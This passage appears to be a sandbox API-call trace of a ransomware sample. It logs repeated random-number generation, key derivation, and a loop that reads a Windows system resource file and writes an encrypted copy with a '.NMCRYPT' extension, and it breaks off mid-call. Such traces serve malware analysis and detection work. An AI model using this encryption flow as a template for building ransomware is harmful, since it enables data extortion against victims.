[0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.174] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.175] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.176] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.176] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0161.176] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.176] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad878) returned 1 [0161.176] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.176] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.176] wcslen (_String="\\\\?\\") returned 0x4 [0161.176] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad278) returned 1 [0161.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.176] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0161.177] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.177] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.178] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.178] GetLastError () returned 0x0 [0161.178] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.198] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.199] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.199] GetLastError () returned 0x0 [0161.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.199] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.199] GetLastError () returned 0x0 [0161.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.199] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.199] GetLastError () returned 0x0 [0161.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.199] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.199] GetLastError () returned 0x0 [0161.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.199] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.199] GetLastError () returned 0x0 [0161.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.199] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.199] GetLastError () returned 0x0 [0161.199] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.199] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.200] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.200] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.200] GetLastError () returned 0x0 [0161.200] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.201] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.201] GetLastError () returned 0x0 [0161.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.201] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.201] GetLastError () returned 0x0 [0161.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.201] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.201] GetLastError () returned 0x0 [0161.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.201] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.201] GetLastError () returned 0x0 [0161.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.201] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.201] GetLastError () returned 0x0 [0161.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.201] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.201] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.201] GetLastError () returned 0x0 [0161.201] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.202] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.202] GetLastError () returned 0x0 [0161.202] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.202] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.202] CryptEncrypt (in: 